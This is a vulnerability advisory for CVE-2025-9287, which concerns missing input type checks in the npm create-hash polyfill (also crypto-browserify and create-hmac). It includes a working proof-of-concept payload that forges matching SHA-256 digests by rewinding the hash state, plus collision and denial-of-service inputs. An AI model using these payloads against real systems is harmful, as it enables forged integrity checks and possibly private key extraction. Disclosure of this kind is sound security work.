CVE-2025-9287

Summary

This affects e.g. create-hash (and crypto-browserify), so I'll describe the issue against that package Also affects create-hmac and other packages

Node.js createHash works only on strings or instances of Buffer, TypedArray, or DataView.

Missing input type checks (in npm create-hash polyfill of Node.js createHash) can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.

Details

See PoC

PoC

const createHash = require('create-hash/browser.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = createHash('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever

const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])

Output:

9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
Hashed input means safe

This works with:

const forgeHash = (valid, wanted) => JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])

But there are other types of input which lead to unchecked results

Impact

1. Hash state rewind on {length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.
2. Value miscalculation, e.g. a collision is generated by { length: buf.length, ...buf, 0: buf[0] + 256 } This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js)
3. DoS on {length:'1e99'}
4. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like GHSA-vjh7-7g9h-fjfh)
5. Also, other typed arrays results are invalid, e.g. returned hash of new Uint16Array(5) is the same as new Uint8Array(5), not new Uint16Array(10) as it should have been (and is in Node.js crypto) -- same for arrays with values non-zero, their hashes are just truncated to %256 instead of converted to correct bytelength